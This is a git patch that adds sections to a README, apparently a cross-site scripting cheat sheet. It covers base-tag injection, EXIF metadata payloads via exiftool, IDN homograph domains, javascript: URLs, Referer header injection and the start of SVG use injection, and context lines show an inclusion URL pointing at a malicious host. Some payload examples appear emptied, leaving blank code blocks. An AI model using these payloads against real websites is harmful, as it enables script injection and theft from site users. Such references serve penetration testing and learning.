From c2c96ef08b86771b5edda22b5bb9f1c2985f1af2 Mon Sep 17 00:00:00 2001
From: ShadowByte <155693555+ShadowByte1@users.noreply.github.com>
Date: Wed, 7 Aug 2024 14:08:45 +1000
Subject: [PATCH] Update README.md
---
README.md | 99 +++++++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 99 insertions(+)
diff --git a/README.md b/README.md
index 5f9168a..ccb8360 100644
--- a/README.md
+++ b/README.md
@@ -573,8 +573,107 @@ Injecting malicious content into iframe sources can lead to XSS.
http://example.com/page.php?page=http://malicious.com
```
+Injecting Base Tags
+If script tags and event handler attributes are blogged you can try to leverage base tags for XSS
+```
+//lets say the site has a script tag like this
+
+//the attacker could inject
+
+//and host their own static/js/context.js. note: the injection point must be above the targetted script
+```
+Exploiting SQL errors
+if you see SQL errors, they are often not sanitized. This means they are worth checking for reflected xss. This doesn't only apply to SQL specifically but its the context I've seen this most
+
+Exif Data Injection to XSS
+Inject XSS Payloads into Exif data if the form is not sanitized properly
+Use a tool like ExifTool to embed a JavaScript payload in the EXIF metadata of an image.
+```
+exiftool -Title='' image.jpg
+```
+
+(IDN) Homograph Attack
+IDN allows the use of Unicode characters in domain names. Attackers can register domains that look visually similar to trusted domains by using characters from different languages that look alike. These domains can then host malicious content.
+
+
+
Exploiting WebAssembly
WebAssembly (Wasm) code that includes user input can be manipulated to execute malicious scripts.
```
WebAssembly.instantiateStreaming(fetch('module.wasm'), { env: { userInput: user_input } });
```
+JavaScript URL Injection
+If an application uses URLs with the javascript: scheme in places where it accepts input, this can lead to XSS.
+```
+javascript:alert('XSS via JavaScript URL')
+```
+
+Referer Header Injection
+If an application reflects the Referer header without sanitization, it can lead to XSS.
+```
+Referer: https://attacker-site.com/
+```
+
+SVG Use Element Injection
+The